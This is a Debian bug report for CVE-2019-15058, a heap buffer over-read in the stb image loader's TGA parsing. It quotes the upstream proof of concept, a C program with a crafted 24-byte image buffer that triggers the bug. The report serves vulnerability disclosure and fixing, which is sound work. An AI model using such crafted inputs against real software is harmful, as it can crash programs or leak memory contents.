Source: libstb
Version: 0.0~git20190617.5.c72a95d-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/nothings/stb/issues/790
Hi,
The following vulnerability was published for libstb.
CVE-2019-15058[0]:
| stb_image.h (aka the stb image loader) 2.23 has a heap-based buffer
| over-read in stbi__tga_load, leading to Information Disclosure or
| Denial of Service.
The reproduce the issue, upstream issue provides a poc:
|#define STBI_WINDOWS_UTF8
|#define STB_IMAGE_WRITE_IMPLEMENTATION
|#include "stb_image_write.h"
|#define STB_IMAGE_IMPLEMENTATION
|#include "stb_image.h"
|#define STB_DEFINE
|#include "stb.h"
|#include<stdio.h>
|#include<stdlib.h>
|unsigned char data[] =
|{
| 0xAF, 0x01, 0x09, 0x00, 0x00, 0x00, 0x00, 0x10, 0x14, 0x0A,
| 0xAF, 0x00, 0xEF, 0xEF, 0xEF, 0x11, 0x10, 0xEF, 0xEB, 0xF5,
| 0x50, 0xFE, 0xFE, 0x09
|};
|int main(int argc, char **argv)
|{
| int x,y,n;
| stbi_load_from_memory(data,sizeof(data),&x,&y,&n,4);
| return 0;
|}
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-15058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15058
[1] https://github.com/nothings/stb/issues/790
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
